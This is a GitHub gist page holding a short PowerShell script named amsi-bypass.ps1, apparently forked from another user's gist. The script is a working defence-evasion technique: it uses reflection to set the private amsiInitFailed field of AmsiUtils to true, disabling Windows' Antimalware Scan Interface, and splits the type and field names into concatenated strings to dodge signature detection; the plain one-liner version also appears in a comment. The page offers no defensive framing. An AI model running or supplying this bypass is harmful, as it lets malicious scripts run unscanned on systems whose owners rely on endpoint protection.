Skip to content

Instantly share code, notes, and snippets.

@an00byss

an00byss/amsi-bypass.ps1

Forked from timsonner/amsi-bypass.ps1
Created July 24, 2025 22:09
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save an00byss/66f41eb970057d7ecb0f7045b191ed2f to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save an00byss/66f41eb970057d7ecb0f7045b191ed2f to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. @timsonner timsonner created this gist Oct 22, 2024.
    13 changes: 13 additions & 0 deletions amsi-bypass.ps1
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,13 @@
    # [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
    # Create a reference to the assembly with further obfuscation
    $randomPart = 'A' + 'msi' + 'Utils'
    $ref = [Ref]
    $asm = $ref.Assembly
    $amsiType = $asm.GetType('System.' + 'Management.' + 'Automation.' + $randomPart)

    # Prepare the field name in a more obfuscated way
    $amsiFieldName = 'amsi' + 'Init' + 'Failed'
    $amsiField = $amsiType.GetField($amsiFieldName, 'NonPublic, Static')

    # Set the field value to bypass AMSI
    $amsiField.SetValue($null, $true)